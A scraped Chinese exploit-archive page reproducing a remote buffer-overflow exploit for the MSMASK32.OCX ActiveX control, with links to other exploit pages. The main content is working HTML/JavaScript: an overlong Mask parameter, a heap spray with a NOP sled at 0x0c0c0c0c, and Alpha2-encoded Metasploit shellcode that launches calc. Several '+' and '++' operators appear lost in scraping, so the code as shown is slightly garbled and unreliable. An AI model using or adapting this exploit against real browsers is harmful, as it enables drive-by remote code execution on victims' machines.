手机
当前位置:查字典教程网 >网络安全 >Exploit >Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
摘要:MicrosoftVisualStudio(Msmask32.ocx)ActiveXRemoteBufferOverflowExploitA...

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi

Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one.

Heaps are handy. #################################################

Loaded File: C:WINDOWSsystem32MSMASK32.OCX

Name: MSMask

Version: 1.1

Class MaskEdBox

GUID: {C932BA85-4374-101B-A56C-00AA003668DC}

Number of Interfaces: 1

Default Interface: IMSMask

RegKey Safe for Script: False

RegKey Safe for Init: True

KillBitSet: False

#################################################

gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years! <input language=JavaScript onclick=doIt() type=button value="Test Exploit">

<script language="JavaScript"> function doIt()

{

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf1 = '';

for (i=1;i<=1945;i ){buf1=buf1 unescape(" ");} // win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949"

"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b"

"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875"

"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c"

"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b"

"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e"

"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a"

"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35"

"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b"

"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b"

"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470"

"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550"

"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550"

"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070"

"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68"

"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047"

"%u6363%u5251%u634c%u5553%u4550");

// A read through "Heap Feng Shui in JavaScript" shed some

// much needed light on this topic for me. Thank you Alexander Sotirov.

var shellcodeSize = (shellcode.length * 2);

var spraySled = unescape("%u9090%u9090");

var heapAddress = 0x0c0c0c0c;

var heapBlockSize = 0x100000;

var spraySledSize = heapBlockSize - (shellcodeSize 1);

var heapBlocks = (heapAddress heapBlockSize)/heapBlockSize;

var x = new Array();

while (spraySled.length*2<spraySledSize)

{

spraySled = spraySled;

}

spraySled = spraySled.substring(0,spraySledSize/2);

for (i=0;i<heapBlocks;i )

{

x[i] = spraySled shellcode;

}

document.write(body buf1 body1);

} </script>

【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit】相关文章:

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

MS Internet Explorer (FTP Server Response) DoS Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

精品推荐
分类导航